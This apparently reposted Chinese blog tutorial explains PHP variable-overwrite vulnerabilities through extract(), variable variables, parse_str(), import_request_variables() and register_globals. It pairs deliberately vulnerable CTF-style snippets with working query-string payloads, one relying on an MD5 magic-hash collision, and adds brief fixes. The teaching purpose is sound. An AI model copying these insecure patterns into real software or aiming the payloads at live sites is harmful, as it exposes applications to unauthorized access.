PHP中的变量覆盖漏洞有哪些
目录
- 1.extract()变量覆盖
- 2.PHP动态变量覆盖
- 3.parse_str()变量覆盖
- 4.import_request_variables()变量覆盖
- 5.PHP全局变量覆盖
1.extract()变量覆盖
1.extract()
extract() 函数从数组中将变量导入到当前的符号表。
该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
该函数返回成功设置的变量数目。
extract(array,extract_rules,prefix)
参考引用:https://www.runoob.com/php/func-array-extract.html
eg:
?php
extract($_GET);
echo $name.'br>
';
echo $age.'br>
';
echo $phone.'br>
';
//GET传参:?name=xiaohua&
age=22&
phone=112323123
//结果:
// xiaohua
// 22
// 112323123
?>
2.CTF中extract()导致的变量覆盖
?php
$flag='flag.php';
extract($_GET);
if(isset($ceshi))
{
$content=trim(file_get_contents($flag));
if($ceshi==$content)
{
echo'flag{
xxxxxxx}
';
}
else
{
echo'Oh.no';
}
}
?>
我们大致分析是要求我们GET传参进去值会经过extract()函数下来会有两个if 第一个if判断 ceshi这个变量是否存在 存在则继续执行if里面的
使用file_get_contents()读取flag变量里面的文件传递给content变量 之后再进行判断传进来ceshi变量的值等不等于$content如果等于则打印出flag!
这里我们构造因为通过extract()函数我们传进的值会变成一个变量 例如我们GET传入 ceshi=1 则会存在$ceshi=1 所以我们构造GET传参pyaload:
GET传参payload:$ceshi=& $flag=
这样再程序中会有两个为空的变量而$flag=空 则覆盖了上面的$flag中的值 这样进行判断 都是空的所以为真则得到flag
3.漏洞修复
不要使用。。。。
参考 官方文档 修改extract_rules 里面的值为EXTR_SKIP eg:
extract($_GET,EXTR_SKIP);
2.PHP动态变量覆盖
1.动态变量覆盖
PHP动态变量是指一个变量名的变量名可以动态的设置和使用,一个变量获取另一个变量的值作为这个变量的变量名。
?php
$bar= "a";
$Foo="Bar";
$World="Foo";
$Hello="world";
$a="Hello";
echo $a;
//hello
echo $$a;
//world
echo $$$a;
//foo
echo $$$$$a;
//Bar
echo $$$$$$a;
//a
echo $$$$$$$a;
//hello
echo $$$$$$$$a;
//world
?>
CTF中的动态变量覆盖
https://www.cnblogs.com/xhds/p/12586928.html CTF中的动态变量覆盖
3.漏洞修复
避免使用这个
3.parse_str()变量覆盖
1.parse_str()
parse_str() 函数把查询字符串解析到变量中。
注释:如果未设置 array 参数,由该函数设置的变量将覆盖已存在的同名变量。
注释:php.ini 文件中的 magic_quotes_gpc 设置影响该函数的输出。如果已启用,那么在 parse_str() 解析之前,变量会被 addslashes() 转换。
parse_str(string,array)
参考引用:https://www.runoob.com/php/func-string-parse-str.html
eg:
?php
parse_str("name=xiaohua&
age=22");
echo $name."br>
";
echo $age;
?>
//xiaohua
//22
2.CTF中parse_str()导致的变量覆盖
?php
error_reporting(0);
$flag="flag{
xiaohua-2020}
";
if (empty($_GET['id'])) {
show_source(__FILE__);
die();
}
else {
$a = "www.xiaohua.com";
$id = $_GET['id'];
@parse_str($id);
//
if ($a[0] != 'QNKCDZO' &
&
md5($a[0]) == md5('QNKCDZO')) {
echo $flag;
}
else {
exit("no no");
}
}
?>
分析代码 判断GET传入的id值是否为空为空的话输出源码终止程序,否则的话则接收id值 经过parse_str() 然后呢if判断 $a[0] 的值要不等于QNKCDZO
但$a[0]的md5值要等于QNKCDZO这里可以采用Hash比较缺陷来解决这一步 下来就是传入变量覆盖$a[0]的值 因为有parse_str所以我们可以构造payload:
payload:http://127.0.0.1/test.php?id=a[0]=s878926199a
3.漏洞修复
为了防止变量覆盖,尽量使用指定输出变量方式
4.import_request_variables()变量覆盖
1.import_request_variables()
(PHP 4 > = 4.1.0, PHP 5 5.4.0)
import_request_variables―将 GET/POST/Cookie 变量导入到全局作用域中
将 GET/POST/Cookie 变量导入到全局作用域中。如果你禁止了register_globals,但又想用到一些全局变量,那么此函数就很有用。
import_request_variables ( string $types [, string $prefix ] ) : bool
参考引用:https://www.php.net/manual/zh/function.import-request-variables.php
2.CTF中import_request_variables()导致的变量覆盖
?php
$num=0;
//include 'flag.php';
import_request_variables('gp');
//导入get和post中变量
if($num=="xiaohua"){
echo 'flag{
xiaohua-2020-3-28}
';
// echo $flag.php;
}
else{
echo "NO!";
}
?>
//payload:http://127.0.0.1/test.php?num=xiaohua
//flag{
xiaohua-2020-3-28}
3.漏洞修复
尽量不要使用....
5.PHP全局变量覆盖
1.register_globals
当register_globals全局变量设置开启时,传递过来的值会被直接注册为全局变量而使用,这会造成全局变量覆盖
在PHP5.3之前 默认开启 PHP5.3默认关闭 PHP5.6及5.7已经被移除
2.CTF中全局变量覆盖
测试环境:php5.2.17
?php
if ($num){
echo "flag{
xiaohua-2020-3-28}
";
}
?>
//payload:http://127.0.0.1/test.php?num=1
//flag{
xiaohua-2020-3-28}
3.漏洞修复
关闭register_globals=off 或者使用5.6以上版本。。
到此这篇关于“PHP中的变量覆盖漏洞有哪些”的文章就介绍到这了,感谢各位的阅读,更多相关PHP中的变量覆盖漏洞有哪些内容,欢迎关注网络资讯频道,小编将为大家输出更多高质量的实用文章!
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: PHP中的变量覆盖漏洞有哪些
本文地址: https://pptw.com/jishu/652324.html